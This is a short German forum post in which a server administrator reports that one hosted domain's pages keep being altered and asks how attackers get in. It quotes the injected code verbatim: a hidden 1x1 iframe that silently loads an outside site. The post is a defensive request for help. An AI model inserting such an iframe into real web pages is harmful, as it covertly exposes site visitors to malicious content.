Hello,
wer kann mich mal umfassend aufklären?
Bei einem Server, der für unterschiedliche Domains genutzt wird, haben wir bei einer Domain Ärger mit "merkwürdigen Erscheinungen".
Es dauert keine fünf Minuten, dann werden Seiten verändert, indem z.B. eine Zeile Code eingefügt wird:
<iframe src="http://zymkasi.com/?click=87C13C" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Der Aufruf der Seite http://zymkasi.com/ führt zu obigem Warnhinweis.
Kommt der nun aus meinem Firefox?
Was wollen diese Leute?
Wie kommen die ins System?
Alle anderen Domains auf der Maschine sind bisher nicht angegriffen worden.
Das iFrame stammmt nicht von uns und auch nicht vom Kunden.
Ich habe nun den Auftrag, das zu untersuchen und suche nach ähnlichen Erfahrungen.
Liebe Grüße aus dem schönen Oberharz
Tom vom Berg